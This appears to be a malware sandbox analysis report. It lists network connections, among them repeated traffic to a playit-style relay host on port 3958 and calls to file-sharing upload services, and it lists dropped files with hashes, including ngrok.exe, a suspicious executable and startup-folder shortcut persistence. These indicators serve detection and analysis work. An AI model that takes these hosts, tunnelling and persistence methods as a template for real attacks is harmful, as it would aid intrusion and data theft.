| US | 8.8.8.8:53 | 47.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | static.cloudflareinsights.com | tcp |
| US | 172.64.147.47:443 | a.fsdn.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| US | 8.8.8.8:53 | cdn.consentmanager.net | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| GB | 89.187.167.7:443 | cdn.consentmanager.net | tcp |
| US | 8.8.8.8:53 | 1376624012.rsc.cdn77.org | udp |
| US | 8.8.8.8:53 | d.delivery.consentmanager.net | udp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| US | 8.8.8.8:53 | 1376624012.rsc.cdn77.org | udp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| US | 104.18.33.97:443 | c.sf-syn.com | tcp |
| US | 8.8.8.8:53 | c.sf-syn.com | udp |
| US | 104.18.33.97:443 | c.sf-syn.com | udp |
| US | 8.8.8.8:53 | 101.56.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.98.230.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.33.18.104.in-addr.arpa | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| NL | 216.52.2.16:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | oeu.vap.lijit.com | udp |
| DE | 52.59.150.152:443 | btlr.sharethrough.com | tcp |
| DE | 52.59.150.152:443 | btlr.sharethrough.com | tcp |
| DE | 52.59.150.152:443 | btlr.sharethrough.com | tcp |
| DE | 52.59.150.152:443 | btlr.sharethrough.com | tcp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| DE | 69.173.144.140:443 | fastlane.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | oeu.vap.lijit.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 8.8.8.8:53 | btlr-eu-central-1.sharethrough.com | udp |
| US | 8.8.8.8:53 | analytics.slashdotmedia.com | udp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | hbopenbid-ams.pubmnet.com | udp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 8.8.8.8:53 | hbopenbid-ams.pubmnet.com | udp |
| US | 8.8.8.8:53 | ml314.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.2.52.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.150.59.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.144.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.189.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.38.105.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | securepubads46.g.doubleclick.net | udp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| GB | 142.250.187.194:443 | securepubads46.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 34.117.77.79:443 | ml314.com | udp |
| GB | 142.250.187.194:443 | securepubads46.g.doubleclick.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| IE | 52.210.214.220:443 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| DE | 3.122.214.165:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| IE | 54.170.64.73:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 79.77.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.69.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | 981e269e0f096d6cffe0cfba36c07839.safeframe.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | 981e269e0f096d6cffe0cfba36c07839.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| US | 8.8.8.8:53 | pagead-googlehosted.l.google.com | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| GB | 142.250.179.225:443 | pagead-googlehosted.l.google.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 220.214.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.214.122.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.64.170.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.179.226:443 | www.googletagservices.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| GB | 96.16.109.9:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | e6603.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | imgsync-amsfpairbc.pubmnet.com | udp |
| US | 8.8.8.8:53 | h2.shared.global.fastly.net | udp |
| US | 8.8.8.8:53 | imgsync-amsfpairbc.pubmnet.com | udp |
| US | 8.8.8.8:53 | h2.shared.global.fastly.net | udp |
| US | 151.101.2.49:443 | h2.shared.global.fastly.net | tcp |
| NL | 198.47.127.18:443 | imgsync-amsfpairbc.pubmnet.com | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| NL | 213.19.162.90:443 | pixel.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| DE | 3.123.163.66:443 | match.sharethrough.com | tcp |
| DE | 3.123.163.66:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | match-eu-central-1-ecs.sharethrough.com | udp |
| US | 8.8.8.8:53 | 9.109.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.163.123.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.162.19.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 52.3.143.140:443 | api-iam.intercom.io | tcp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| US | 8.8.8.8:53 | api-iam.intercom.io | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 8.8.8.8:53 | 105.111.68.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | netix.dl.sourceforge.net | udp |
| BG | 87.121.121.2:443 | netix.dl.sourceforge.net | tcp |
| US | 8.8.8.8:53 | netix.dl.sourceforge.net | udp |
| US | 8.8.8.8:53 | netix.dl.sourceforge.net | udp |
| BG | 87.121.121.2:443 | netix.dl.sourceforge.net | tcp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | deac-riga.dl.sourceforge.net | udp |
| LV | 89.111.52.100:443 | deac-riga.dl.sourceforge.net | tcp |
| US | 8.8.8.8:53 | deac-riga.dl.sourceforge.net | udp |
| US | 8.8.8.8:53 | deac-riga.dl.sourceforge.net | udp |
| US | 8.8.8.8:53 | 100.52.111.89.in-addr.arpa | udp |
| LV | 89.111.52.100:443 | deac-riga.dl.sourceforge.net | tcp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| DE | 52.59.150.152:443 | btlr.sharethrough.com | tcp |
| NL | 185.89.210.244:443 | ib.anycast.adnxs.com | tcp |
| NL | 216.52.2.16:443 | oeu.vap.lijit.com | tcp |
| GB | 142.250.187.194:443 | securepubads46.g.doubleclick.net | udp |
| GB | 142.250.179.225:443 | pagead-googlehosted.l.google.com | udp |
| GB | 142.250.179.226:443 | www.googletagservices.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 8.8.8.8:53 | wj32.org | udp |
| US | 162.243.25.33:443 | wj32.org | tcp |
| N/A | 127.0.0.1:56666 | tcp | |
| N/A | 127.0.0.1:56666 | tcp | |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | processhacker.sourceforge.net | udp |
| US | 104.18.37.111:80 | processhacker.sourceforge.net | tcp |
| US | 104.18.37.111:443 | processhacker.sourceforge.net | tcp |
| US | 172.64.148.49:443 | prwebsecure.sourceforge.io.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | 111.37.18.104.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| GB | 142.250.200.4:80 | www.google.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | file.io | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 8.8.8.8:53 | hawkish.eu | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 24.107.55.45.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.121.5.163.in-addr.arpa | udp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| FR | 163.5.121.96:443 | hawkish.eu | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
| MD5 | 79d678dc0f7ce5531987f419b5b351d8 |
| SHA1 | 8057d198da18ae7bc498917926aeb8953e45a428 |
| SHA256 | 1c56041812c05c134bc380961330e38053774cf08596846b66e9fdf848783400 |
| SHA512 | 97d1a92d812633c1f85fcc85d63959bb0bc835c8003567693caff3bbfc385459a0b3a9662737b15cc26949148e0b8ef6e83513db20b9a8ba5c374feedd287684 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
| MD5 | 32a4a1eb04f1c7e75e95321992a193b4 |
| SHA1 | 009a7ff13e0bf73ad3b9b4d31d7192be4f6f22e2 |
| SHA256 | 602b5b3924e9e408dddf592a561bf2dd7fc561bd6db31120d6c2652091df733a |
| SHA512 | a41a648d98a2e28cf7b4129c9b5136e5eda773addb7dad311d2141ad5075c3363fc25d1a81cefc36abef9a0d3dd3456b2bbdfc06cb8088f6d082559fc7575bdf |
memory/3640-14-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/3640-15-0x00000000003B0000-0x0000000000442000-memory.dmp
memory/3640-16-0x0000000004E30000-0x0000000004ECC000-memory.dmp
memory/3640-17-0x0000000005480000-0x0000000005A24000-memory.dmp
memory/3640-18-0x0000000004F70000-0x0000000005002000-memory.dmp
memory/3640-19-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-20-0x0000000004EF0000-0x0000000004EFA000-memory.dmp
memory/3640-21-0x0000000005130000-0x0000000005186000-memory.dmp
memory/3640-22-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-23-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-24-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-25-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-26-0x0000000007F60000-0x0000000008060000-memory.dmp
memory/3640-27-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/3640-28-0x00000000080C0000-0x00000000080DE000-memory.dmp
memory/3640-31-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-32-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/3640-44-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
memory/2660-46-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/3640-47-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/2660-48-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-49-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-50-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-51-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-52-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-53-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-54-0x0000000007F90000-0x0000000008090000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
| MD5 | 371e9f5c5222743275e228f1b3d27fb1 |
| SHA1 | 31b0a7ada0ee8c593d1f7d4b8fa3f830566a5fd6 |
| SHA256 | 5684b6a81a92bef5cd5eb049a0e905dc99e7db95d907443f182614b9b48602f1 |
| SHA512 | 14f203f243e9c69a3b3e1beaf8599d5cd0f18627e446a3beac78cb611bb4259ffb4c47ece4da3d3ff4ee1dd01aa379b081a3548844070d3b7312f56d22ffc78f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
| MD5 | a0e21c3cda955b529c05da3ebc737559 |
| SHA1 | 7cede9bd6a34b2ddb326c3733057cf76b11e3d45 |
| SHA256 | b34c6f792079e84046ce8c2049f6f233e6c235f025770a028dfc8d57bc54af8c |
| SHA512 | e37365ed423d523ca996460ab7adab0a19923906413d22cccde2f1ce144ea25deef5e1a2a6d3cc8580952ebd58438f36f5eb2cb82348e1e3d126fa248d5fc18a |
memory/2660-59-0x00000000748F0000-0x00000000750A0000-memory.dmp
memory/2660-60-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-61-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-62-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-63-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-64-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-65-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-66-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/2660-67-0x0000000007F90000-0x0000000008090000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\db\data.safe.bin
| MD5 | c38dad3f5c479337b0f22f7470389697 |
| SHA1 | c92f69f3c68f9f1a1605bf08efaab1dbcf80f506 |
| SHA256 | 4e32f53d17b7f5d5348dec19f725a9c7e3cbba67be9a9d2562b817bfa71cd56a |
| SHA512 | 6e1ecfc9f58332e47d410c99a47aef8c8282c15731de28cb720e0571b816617752480dc6eb0dc195afb683243c27bacaa5e415df33cff488736a5c5d5878b58e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\pending_pings\f7cb872e-9723-4776-b547-aea4030eb296
| MD5 | 6844812e4b6aba8577b1fbbdfe17dc45 |
| SHA1 | 728cd6a10a334c55b50e6dde6c4aef304b378d6c |
| SHA256 | 1ad06fdfca5ca4a588deffca311abc75421a62d2c755613f5fe1107650148950 |
| SHA512 | 580e3f28788eaacc0c6052e029089b8d1818eac72ee970f0f2a0b276b89ec9c33d2cbceb64668068c6333816fd4cf61a16dd461cf42b63655b0aa6368357cbec |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\pending_pings\c78bf86e-b2ac-408d-9aa5-19334630b331
| MD5 | 97ca994d674620aa48eee07539ccf4b3 |
| SHA1 | 73054b9b9b8b89abb2e4ac19916eb962bca0831c |
| SHA256 | 59a8f8ed5fe83cb612f59987082ac374a78f58ee11914a674ea93d3b2f2e34d7 |
| SHA512 | f62e4d5b106d2eec1a56341a2dcd85c94a5c64b28290befa882dba61329895d0b9644d8d89d6f9ebacd19fa2d3bf3ae008907502224b2696cdd3aecb6f4f0aa0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | fb2214180f7e845b89cba6ea3432a264 |
| SHA1 | 2ed4dc2b0a5259b577e1110865e7559f99c74809 |
| SHA256 | 5e38326694072d24a675a90002a8f8be8d554cc5bf4607368adb81b6adf0891b |
| SHA512 | 0ec34412b63dff10aa3fc72de0a197a04572aa31a9c569741f77528cbbb320376b05d7152d003bb6d53fdd3e9f22938eed9a619995dbfa2d8a51907a907cf896 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\prefs-1.js
| MD5 | 9c92cbba6f5d8d220c5ac67bea75e325 |
| SHA1 | b9cef7ad3d3e3393ea114dc7eb87e86e5349f919 |
| SHA256 | d74c9be2091238ed442c18e52592b619fa864196ea0cc886cd24d073a0b48adb |
| SHA512 | cd774cc9345da7f86f7b4bfab5f36242d3b3becbe2e9661e00fafc2120f671c0920a9ebfb4d46872ec7328c46a7f55e366ab886f1484eb3bec1d2f64b6bb6091 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cache2\entries\7002E71F4F8431A3D59D2158243A0EA278856918
| MD5 | 3937426574308d4cbe30a80ba5d929e0 |
| SHA1 | 1d7132260d397f71717dee80fa0c921d77e23fad |
| SHA256 | f9f167c49e49c8126a1f349b03b3595bfff021e7aed2c25ad7418f098131adf3 |
